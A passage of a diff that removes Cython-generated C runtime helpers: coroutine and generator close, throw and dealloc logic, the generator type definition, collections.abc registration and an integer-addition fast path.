PyErr_SetNone(PyExc_GeneratorExit); - retval = __Pyx_Coroutine_SendEx(gen, NULL, 1); - if (unlikely(retval)) { - const char *msg; - Py_DECREF(retval); - if ((0)) { - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_Coroutine_Check(self)) { - msg = "coroutine ignored GeneratorExit"; - #endif - #ifdef __Pyx_AsyncGen_USED - } else if (__Pyx_AsyncGen_CheckExact(self)) { -#if PY_VERSION_HEX < 0x03060000 - msg = "async generator ignored GeneratorExit - might require Python 3.6+ finalisation (PEP 525)"; -#else - msg = "async generator ignored GeneratorExit"; -#endif - #endif - } else { - msg = "generator ignored GeneratorExit"; - } - PyErr_SetString(PyExc_RuntimeError, msg); - return NULL; - } - raised_exception = PyErr_Occurred(); - if (likely(!raised_exception || 
__Pyx_PyErr_GivenExceptionMatches2(raised_exception, PyExc_GeneratorExit, PyExc_StopIteration))) { - if (raised_exception) PyErr_Clear(); - Py_INCREF(Py_None); - return Py_None; - } - return NULL; -} -static PyObject *__Pyx__Coroutine_Throw(PyObject *self, PyObject *typ, PyObject *val, PyObject *tb, - PyObject *args, int close_on_genexit) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - PyObject *yf = gen->yieldfrom; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - PyObject *ret; - Py_INCREF(yf); - if (__Pyx_PyErr_GivenExceptionMatches(typ, PyExc_GeneratorExit) && close_on_genexit) { - int err = __Pyx_Coroutine_CloseIter(gen, yf); - Py_DECREF(yf); - __Pyx_Coroutine_Undelegate(gen); - if (err < 0) - return __Pyx_Coroutine_MethodReturn(self, __Pyx_Coroutine_SendEx(gen, NULL, 0)); - goto throw_here; - } - gen->is_running = 1; - if (0 - #ifdef __Pyx_Generator_USED - || __Pyx_Generator_CheckExact(yf) - #endif - #ifdef __Pyx_Coroutine_USED - || __Pyx_Coroutine_Check(yf) - #endif - ) { - ret = __Pyx__Coroutine_Throw(yf, typ, val, tb, args, close_on_genexit); - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_CoroutineAwait_CheckExact(yf)) { - ret = __Pyx__Coroutine_Throw(((__pyx_CoroutineAwaitObject*)yf)->coroutine, typ, val, tb, args, close_on_genexit); - #endif - } else { - PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(yf, __pyx_n_s_throw); - if (unlikely(!meth)) { - Py_DECREF(yf); - if (unlikely(PyErr_Occurred())) { - gen->is_running = 0; - return NULL; - } - __Pyx_Coroutine_Undelegate(gen); - gen->is_running = 0; - goto throw_here; - } - if (likely(args)) { - ret = __Pyx_PyObject_Call(meth, args, NULL); - } else { - PyObject *cargs[4] = {NULL, typ, val, tb}; - ret = __Pyx_PyObject_FastCall(meth, cargs+1, 3 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); - } - Py_DECREF(meth); - } - gen->is_running = 0; - Py_DECREF(yf); - if (!ret) { - ret = __Pyx_Coroutine_FinishDelegation(gen); - } - return 
__Pyx_Coroutine_MethodReturn(self, ret); - } -throw_here: - __Pyx_Raise(typ, val, tb, NULL); - return __Pyx_Coroutine_MethodReturn(self, __Pyx_Coroutine_SendEx(gen, NULL, 0)); -} -static PyObject *__Pyx_Coroutine_Throw(PyObject *self, PyObject *args) { - PyObject *typ; - PyObject *val = NULL; - PyObject *tb = NULL; - if (unlikely(!PyArg_UnpackTuple(args, (char *)"throw", 1, 3, &typ, &val, &tb))) - return NULL; - return __Pyx__Coroutine_Throw(self, typ, val, tb, args, 1); -} -static CYTHON_INLINE int __Pyx_Coroutine_traverse_excstate(__Pyx_ExcInfoStruct *exc_state, visitproc visit, void *arg) { -#if PY_VERSION_HEX >= 0x030B00a4 - Py_VISIT(exc_state->exc_value); -#else - Py_VISIT(exc_state->exc_type); - Py_VISIT(exc_state->exc_value); - Py_VISIT(exc_state->exc_traceback); -#endif - return 0; -} -static int __Pyx_Coroutine_traverse(__pyx_CoroutineObject *gen, visitproc visit, void *arg) { - Py_VISIT(gen->closure); - Py_VISIT(gen->classobj); - Py_VISIT(gen->yieldfrom); - return __Pyx_Coroutine_traverse_excstate(&gen->gi_exc_state, visit, arg); -} -static int __Pyx_Coroutine_clear(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - Py_CLEAR(gen->closure); - Py_CLEAR(gen->classobj); - Py_CLEAR(gen->yieldfrom); - __Pyx_Coroutine_ExceptionClear(&gen->gi_exc_state); -#ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(self)) { - Py_CLEAR(((__pyx_PyAsyncGenObject*)gen)->ag_finalizer); - } -#endif - Py_CLEAR(gen->gi_code); - Py_CLEAR(gen->gi_frame); - Py_CLEAR(gen->gi_name); - Py_CLEAR(gen->gi_qualname); - Py_CLEAR(gen->gi_modulename); - return 0; -} -static void __Pyx_Coroutine_dealloc(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - PyObject_GC_UnTrack(gen); - if (gen->gi_weakreflist != NULL) - PyObject_ClearWeakRefs(self); - if (gen->resume_label >= 0) { - PyObject_GC_Track(self); -#if PY_VERSION_HEX >= 0x030400a1 && CYTHON_USE_TP_FINALIZE - if (unlikely(PyObject_CallFinalizerFromDealloc(self))) -#else 
- Py_TYPE(gen)->tp_del(self); - if (unlikely(Py_REFCNT(self) > 0)) -#endif - { - return; - } - PyObject_GC_UnTrack(self); - } -#ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(self)) { - /* We have to handle this case for asynchronous generators - right here, because this code has to be between UNTRACK - and GC_Del. */ - Py_CLEAR(((__pyx_PyAsyncGenObject*)self)->ag_finalizer); - } -#endif - __Pyx_Coroutine_clear(self); - __Pyx_PyHeapTypeObject_GC_Del(gen); -} -static void __Pyx_Coroutine_del(PyObject *self) { - PyObject *error_type, *error_value, *error_traceback; - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - __Pyx_PyThreadState_declare - if (gen->resume_label < 0) { - return; - } -#if !CYTHON_USE_TP_FINALIZE - assert(self->ob_refcnt == 0); - __Pyx_SET_REFCNT(self, 1); -#endif - __Pyx_PyThreadState_assign - __Pyx_ErrFetch(&error_type, &error_value, &error_traceback); -#ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(self)) { - __pyx_PyAsyncGenObject *agen = (__pyx_PyAsyncGenObject*)self; - PyObject *finalizer = agen->ag_finalizer; - if (finalizer && !agen->ag_closed) { - PyObject *res = __Pyx_PyObject_CallOneArg(finalizer, self); - if (unlikely(!res)) { - PyErr_WriteUnraisable(self); - } else { - Py_DECREF(res); - } - __Pyx_ErrRestore(error_type, error_value, error_traceback); - return; - } - } -#endif - if (unlikely(gen->resume_label == 0 && !error_value)) { -#ifdef __Pyx_Coroutine_USED -#ifdef __Pyx_Generator_USED - if (!__Pyx_Generator_CheckExact(self)) -#endif - { - PyObject_GC_UnTrack(self); -#if PY_MAJOR_VERSION >= 3 || defined(PyErr_WarnFormat) - if (unlikely(PyErr_WarnFormat(PyExc_RuntimeWarning, 1, "coroutine '%.50S' was never awaited", gen->gi_qualname) < 0)) - PyErr_WriteUnraisable(self); -#else - {PyObject *msg; - char *cmsg; - #if CYTHON_COMPILING_IN_PYPY - msg = NULL; - cmsg = (char*) "coroutine was never awaited"; - #else - char *cname; - PyObject *qualname; - qualname = gen->gi_qualname; - cname = 
PyString_AS_STRING(qualname); - msg = PyString_FromFormat("coroutine '%.50s' was never awaited", cname); - if (unlikely(!msg)) { - PyErr_Clear(); - cmsg = (char*) "coroutine was never awaited"; - } else { - cmsg = PyString_AS_STRING(msg); - } - #endif - if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, cmsg, 1) < 0)) - PyErr_WriteUnraisable(self); - Py_XDECREF(msg);} -#endif - PyObject_GC_Track(self); - } -#endif - } else { - PyObject *res = __Pyx_Coroutine_Close(self); - if (unlikely(!res)) { - if (PyErr_Occurred()) - PyErr_WriteUnraisable(self); - } else { - Py_DECREF(res); - } - } - __Pyx_ErrRestore(error_type, error_value, error_traceback); -#if !CYTHON_USE_TP_FINALIZE - assert(Py_REFCNT(self) > 0); - if (likely(--self->ob_refcnt == 0)) { - return; - } - { - Py_ssize_t refcnt = Py_REFCNT(self); - _Py_NewReference(self); - __Pyx_SET_REFCNT(self, refcnt); - } -#if CYTHON_COMPILING_IN_CPYTHON - assert(PyType_IS_GC(Py_TYPE(self)) && - _Py_AS_GC(self)->gc.gc_refs != _PyGC_REFS_UNTRACKED); - _Py_DEC_REFTOTAL; -#endif -#ifdef COUNT_ALLOCS - --Py_TYPE(self)->tp_frees; - --Py_TYPE(self)->tp_allocs; -#endif -#endif -} -static PyObject * -__Pyx_Coroutine_get_name(__pyx_CoroutineObject *self, void *context) -{ - PyObject *name = self->gi_name; - CYTHON_UNUSED_VAR(context); - if (unlikely(!name)) name = Py_None; - Py_INCREF(name); - return name; -} -static int -__Pyx_Coroutine_set_name(__pyx_CoroutineObject *self, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__name__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(self->gi_name, value); - return 0; -} -static PyObject * -__Pyx_Coroutine_get_qualname(__pyx_CoroutineObject *self, void *context) -{ - PyObject *name = self->gi_qualname; - CYTHON_UNUSED_VAR(context); - 
if (unlikely(!name)) name = Py_None; - Py_INCREF(name); - return name; -} -static int -__Pyx_Coroutine_set_qualname(__pyx_CoroutineObject *self, PyObject *value, void *context) -{ - CYTHON_UNUSED_VAR(context); -#if PY_MAJOR_VERSION >= 3 - if (unlikely(value == NULL || !PyUnicode_Check(value))) -#else - if (unlikely(value == NULL || !PyString_Check(value))) -#endif - { - PyErr_SetString(PyExc_TypeError, - "__qualname__ must be set to a string object"); - return -1; - } - Py_INCREF(value); - __Pyx_Py_XDECREF_SET(self->gi_qualname, value); - return 0; -} -static PyObject * -__Pyx_Coroutine_get_frame(__pyx_CoroutineObject *self, void *context) -{ - PyObject *frame = self->gi_frame; - CYTHON_UNUSED_VAR(context); - if (!frame) { - if (unlikely(!self->gi_code)) { - Py_RETURN_NONE; - } - frame = (PyObject *) PyFrame_New( - PyThreadState_Get(), /*PyThreadState *tstate,*/ - (PyCodeObject*) self->gi_code, /*PyCodeObject *code,*/ - __pyx_d, /*PyObject *globals,*/ - 0 /*PyObject *locals*/ - ); - if (unlikely(!frame)) - return NULL; - self->gi_frame = frame; - } - Py_INCREF(frame); - return frame; -} -static __pyx_CoroutineObject *__Pyx__Coroutine_New( - PyTypeObject* type, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name) { - __pyx_CoroutineObject *gen = PyObject_GC_New(__pyx_CoroutineObject, type); - if (unlikely(!gen)) - return NULL; - return __Pyx__Coroutine_NewInit(gen, body, code, closure, name, qualname, module_name); -} -static __pyx_CoroutineObject *__Pyx__Coroutine_NewInit( - __pyx_CoroutineObject *gen, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name) { - gen->body = body; - gen->closure = closure; - Py_XINCREF(closure); - gen->is_running = 0; - gen->resume_label = 0; - gen->classobj = NULL; - gen->yieldfrom = NULL; - #if PY_VERSION_HEX >= 0x030B00a4 - gen->gi_exc_state.exc_value = NULL; - #else - 
gen->gi_exc_state.exc_type = NULL; - gen->gi_exc_state.exc_value = NULL; - gen->gi_exc_state.exc_traceback = NULL; - #endif -#if CYTHON_USE_EXC_INFO_STACK - gen->gi_exc_state.previous_item = NULL; -#endif - gen->gi_weakreflist = NULL; - Py_XINCREF(qualname); - gen->gi_qualname = qualname; - Py_XINCREF(name); - gen->gi_name = name; - Py_XINCREF(module_name); - gen->gi_modulename = module_name; - Py_XINCREF(code); - gen->gi_code = code; - gen->gi_frame = NULL; - PyObject_GC_Track(gen); - return gen; -} - -/* PyObject_GenericGetAttrNoDict */ -#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 -static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { - __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); - PyErr_Format(PyExc_AttributeError, -#if PY_MAJOR_VERSION >= 3 - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", - type_name, attr_name); -#else - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", - type_name, PyString_AS_STRING(attr_name)); -#endif - __Pyx_DECREF_TypeName(type_name); - return NULL; -} -static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { - PyObject *descr; - PyTypeObject *tp = Py_TYPE(obj); - if (unlikely(!PyString_Check(attr_name))) { - return PyObject_GenericGetAttr(obj, attr_name); - } - assert(!tp->tp_dictoffset); - descr = _PyType_Lookup(tp, attr_name); - if (unlikely(!descr)) { - return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); - } - Py_INCREF(descr); - #if PY_MAJOR_VERSION < 3 - if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) - #endif - { - descrgetfunc f = Py_TYPE(descr)->tp_descr_get; - if (unlikely(f)) { - PyObject *res = f(descr, obj, (PyObject *)tp); - Py_DECREF(descr); - return res; - } - } - return descr; -} -#endif - -/* PatchModuleWithCoroutine */ -static PyObject* __Pyx_Coroutine_patch_module(PyObject* module, const char* py_code) { -#if 
defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) - int result; - PyObject *globals, *result_obj; - globals = PyDict_New(); if (unlikely(!globals)) goto ignore; - result = PyDict_SetItemString(globals, "_cython_coroutine_type", - #ifdef __Pyx_Coroutine_USED - (PyObject*)__pyx_CoroutineType); - #else - Py_None); - #endif - if (unlikely(result < 0)) goto ignore; - result = PyDict_SetItemString(globals, "_cython_generator_type", - #ifdef __Pyx_Generator_USED - (PyObject*)__pyx_GeneratorType); - #else - Py_None); - #endif - if (unlikely(result < 0)) goto ignore; - if (unlikely(PyDict_SetItemString(globals, "_module", module) < 0)) goto ignore; - if (unlikely(PyDict_SetItemString(globals, "__builtins__", __pyx_b) < 0)) goto ignore; - result_obj = PyRun_String(py_code, Py_file_input, globals, globals); - if (unlikely(!result_obj)) goto ignore; - Py_DECREF(result_obj); - Py_DECREF(globals); - return module; -ignore: - Py_XDECREF(globals); - PyErr_WriteUnraisable(module); - if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, "Cython module failed to patch module with custom type", 1) < 0)) { - Py_DECREF(module); - module = NULL; - } -#else - py_code++; -#endif - return module; -} - -/* PatchGeneratorABC */ -#ifndef CYTHON_REGISTER_ABCS -#define CYTHON_REGISTER_ABCS 1 -#endif -#if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) -static PyObject* __Pyx_patch_abc_module(PyObject *module); -static PyObject* __Pyx_patch_abc_module(PyObject *module) { - module = __Pyx_Coroutine_patch_module( - module, "" -"if _cython_generator_type is not None:\n" -" try: Generator = _module.Generator\n" -" except AttributeError: pass\n" -" else: Generator.register(_cython_generator_type)\n" -"if _cython_coroutine_type is not None:\n" -" try: Coroutine = _module.Coroutine\n" -" except AttributeError: pass\n" -" else: Coroutine.register(_cython_coroutine_type)\n" - ); - return module; -} -#endif -static int __Pyx_patch_abc(void) { -#if defined(__Pyx_Generator_USED) || 
defined(__Pyx_Coroutine_USED) - static int abc_patched = 0; - if (CYTHON_REGISTER_ABCS && !abc_patched) { - PyObject *module; - module = PyImport_ImportModule((PY_MAJOR_VERSION >= 3) ? "collections.abc" : "collections"); - if (unlikely(!module)) { - PyErr_WriteUnraisable(NULL); - if (unlikely(PyErr_WarnEx(PyExc_RuntimeWarning, - ((PY_MAJOR_VERSION >= 3) ? - "Cython module failed to register with collections.abc module" : - "Cython module failed to register with collections module"), 1) < 0)) { - return -1; - } - } else { - module = __Pyx_patch_abc_module(module); - abc_patched = 1; - if (unlikely(!module)) - return -1; - Py_DECREF(module); - } - module = PyImport_ImportModule("backports_abc"); - if (module) { - module = __Pyx_patch_abc_module(module); - Py_XDECREF(module); - } - if (!module) { - PyErr_Clear(); - } - } -#else - if ((0)) __Pyx_Coroutine_patch_module(NULL, NULL); -#endif - return 0; -} - -/* Generator */ -static PyMethodDef __pyx_Generator_methods[] = { - {"send", (PyCFunction) __Pyx_Coroutine_Send, METH_O, - (char*) PyDoc_STR("send(arg) -> send 'arg' into generator,\nreturn next yielded value or raise StopIteration.")}, - {"throw", (PyCFunction) __Pyx_Coroutine_Throw, METH_VARARGS, - (char*) PyDoc_STR("throw(typ[,val[,tb]]) -> raise exception in generator,\nreturn next yielded value or raise StopIteration.")}, - {"close", (PyCFunction) __Pyx_Coroutine_Close_Method, METH_NOARGS, - (char*) PyDoc_STR("close() -> raise GeneratorExit inside generator.")}, - {0, 0, 0, 0} -}; -static PyMemberDef __pyx_Generator_memberlist[] = { - {(char *) "gi_running", T_BOOL, offsetof(__pyx_CoroutineObject, is_running), READONLY, NULL}, - {(char*) "gi_yieldfrom", T_OBJECT, offsetof(__pyx_CoroutineObject, yieldfrom), READONLY, - (char*) PyDoc_STR("object being iterated by 'yield from', or None")}, - {(char*) "gi_code", T_OBJECT, offsetof(__pyx_CoroutineObject, gi_code), READONLY, NULL}, - {(char *) "__module__", T_OBJECT, offsetof(__pyx_CoroutineObject, gi_modulename), 0, 
0}, -#if CYTHON_USE_TYPE_SPECS - {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CoroutineObject, gi_weakreflist), READONLY, 0}, -#endif - {0, 0, 0, 0, 0} -}; -static PyGetSetDef __pyx_Generator_getsets[] = { - {(char *) "__name__", (getter)__Pyx_Coroutine_get_name, (setter)__Pyx_Coroutine_set_name, - (char*) PyDoc_STR("name of the generator"), 0}, - {(char *) "__qualname__", (getter)__Pyx_Coroutine_get_qualname, (setter)__Pyx_Coroutine_set_qualname, - (char*) PyDoc_STR("qualified name of the generator"), 0}, - {(char *) "gi_frame", (getter)__Pyx_Coroutine_get_frame, NULL, - (char*) PyDoc_STR("Frame of the generator"), 0}, - {0, 0, 0, 0, 0} -}; -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_GeneratorType_slots[] = { - {Py_tp_dealloc, (void *)__Pyx_Coroutine_dealloc}, - {Py_tp_traverse, (void *)__Pyx_Coroutine_traverse}, - {Py_tp_iter, (void *)PyObject_SelfIter}, - {Py_tp_iternext, (void *)__Pyx_Generator_Next}, - {Py_tp_methods, (void *)__pyx_Generator_methods}, - {Py_tp_members, (void *)__pyx_Generator_memberlist}, - {Py_tp_getset, (void *)__pyx_Generator_getsets}, - {Py_tp_getattro, (void *) __Pyx_PyObject_GenericGetAttrNoDict}, -#if CYTHON_USE_TP_FINALIZE - {Py_tp_finalize, (void *)__Pyx_Coroutine_del}, -#endif - {0, 0}, -}; -static PyType_Spec __pyx_GeneratorType_spec = { - __PYX_TYPE_MODULE_PREFIX "generator", - sizeof(__pyx_CoroutineObject), - 0, - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_HAVE_FINALIZE, - __pyx_GeneratorType_slots -}; -#else -static PyTypeObject __pyx_GeneratorType_type = { - PyVarObject_HEAD_INIT(0, 0) - __PYX_TYPE_MODULE_PREFIX "generator", - sizeof(__pyx_CoroutineObject), - 0, - (destructor) __Pyx_Coroutine_dealloc, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_HAVE_FINALIZE, - 0, - (traverseproc) __Pyx_Coroutine_traverse, - 0, - 0, - offsetof(__pyx_CoroutineObject, gi_weakreflist), - 0, - (iternextfunc) __Pyx_Generator_Next, - 
__pyx_Generator_methods, - __pyx_Generator_memberlist, - __pyx_Generator_getsets, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, -#if CYTHON_USE_TP_FINALIZE - 0, -#else - __Pyx_Coroutine_del, -#endif - 0, -#if CYTHON_USE_TP_FINALIZE - __Pyx_Coroutine_del, -#elif PY_VERSION_HEX >= 0x030400a1 - 0, -#endif -#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, -#endif -#if __PYX_NEED_TP_PRINT_SLOT - 0, -#endif -#if PY_VERSION_HEX >= 0x030C0000 - 0, -#endif -#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, -#endif -}; -#endif -static int __pyx_Generator_init(PyObject *module) { -#if CYTHON_USE_TYPE_SPECS - __pyx_GeneratorType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_GeneratorType_spec, NULL); -#else - CYTHON_UNUSED_VAR(module); - __pyx_GeneratorType_type.tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - __pyx_GeneratorType_type.tp_iter = PyObject_SelfIter; - __pyx_GeneratorType = __Pyx_FetchCommonType(&__pyx_GeneratorType_type); -#endif - if (unlikely(!__pyx_GeneratorType)) { - return -1; - } - return 0; -} - -/* GeneratorYieldFrom */ -#if CYTHON_USE_TYPE_SLOTS -static void __Pyx_PyIter_CheckErrorAndDecref(PyObject *source) { - __Pyx_TypeName source_type_name = __Pyx_PyType_GetName(Py_TYPE(source)); - PyErr_Format(PyExc_TypeError, - "iter() returned non-iterator of type '" __Pyx_FMT_TYPENAME "'", source_type_name); - __Pyx_DECREF_TypeName(source_type_name); - Py_DECREF(source); -} -#endif -static CYTHON_INLINE PyObject* __Pyx_Generator_Yield_From(__pyx_CoroutineObject *gen, PyObject *source) { - PyObject *source_gen, *retval; -#ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(source)) { - Py_INCREF(source); - source_gen = source; - retval = __Pyx_Generator_Next(source); - } else -#endif - { -#if CYTHON_USE_TYPE_SLOTS - if (likely(Py_TYPE(source)->tp_iter)) { - source_gen = Py_TYPE(source)->tp_iter(source); - if 
(unlikely(!source_gen)) - return NULL; - if (unlikely(!PyIter_Check(source_gen))) { - __Pyx_PyIter_CheckErrorAndDecref(source_gen); - return NULL; - } - } else -#endif - { - source_gen = PyObject_GetIter(source); - if (unlikely(!source_gen)) - return NULL; - } - retval = __Pyx_PyObject_GetIterNextFunc(source_gen)(source_gen); - } - if (likely(retval)) { - gen->yieldfrom = source_gen; - return retval; - } - Py_DECREF(source_gen); - return NULL; -} - -/* append */ -static CYTHON_INLINE int __Pyx_PyObject_Append(PyObject* L, PyObject* x) { - if (likely(PyList_CheckExact(L))) { - if (unlikely(__Pyx_PyList_Append(L, x) < 0)) return -1; - } else { - PyObject* retval = __Pyx_PyObject_CallMethod1(L, __pyx_n_s_append, x); - if (unlikely(!retval)) - return -1; - Py_DECREF(retval); - } - return 0; -} - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long x; - long a = PyInt_AS_LONG(op1); - - x = (long)((unsigned long)a + (unsigned long)b); - if (likely((x^a) >= 0 || (x^b) >= 0)) - return PyInt_FromLong(x); - return PyLong_Type.tp_as_number->nb_add(op1, op2); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - const long b = intval; - long a, x; -#ifdef HAVE_LONG_LONG - const PY_LONG_LONG llb = intval; - PY_LONG_LONG lla, llx; -#endif - if (unlikely(__Pyx_PyLong_IsZero(op1))) { - return __Pyx_NewRef(op2); - } - if (likely(__Pyx_PyLong_IsCompact(op1))) { - a = __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - a = -(long) (((((unsigned 
long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - lla = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { - a = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { - lla = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - a = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - lla = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { - a = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { - lla = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - a = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | 
(unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - lla = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { - a = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { - lla = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_add(op1, op2); - } - } - x = a + b; - return PyLong_FromLong(x); -#ifdef HAVE_LONG_LONG - long_long: - llx = lla + llb; - return PyLong_FromLongLong(llx); -#endif - - - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - double result; - - PyFPE_START_PROTECT("add", return NULL) - result = ((double)a) + (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? 
